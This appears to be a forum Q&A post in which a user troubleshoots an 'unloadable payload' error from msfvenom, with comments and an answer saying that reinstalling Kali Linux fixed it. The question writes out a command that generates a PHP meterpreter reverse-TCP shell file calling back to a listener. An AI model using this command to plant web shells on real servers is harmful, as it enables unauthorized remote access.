# Metasploit - error msfvenom unloadable payload

Tags: metasploit, msfvenom

I have been trying to generate a payload using msfvenom:

```
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.0.2.15 LPORT=1234 -f raw > shell.php
```

I keep getting this error:

```
"error: unloadable payload: php/meterpreter_reverse_tcp"
```

Comment: This looks like a program error. Have you tried Metasploit support forums? It shouldn't be loading a Windows payload when you asked for PHP

Comment: That was a mistake.

Comment: Then please provide the whole output, and not just the parts you think are relevant. That way, we'll also know that there aren't other mistakes or messages...

Comment: When I googled the error, the suggested fix is to run with `sudo` - did you try that?

Answer (score 0):

I finally fixed it. I had to uninstall and re-download my Kali Linux the official website.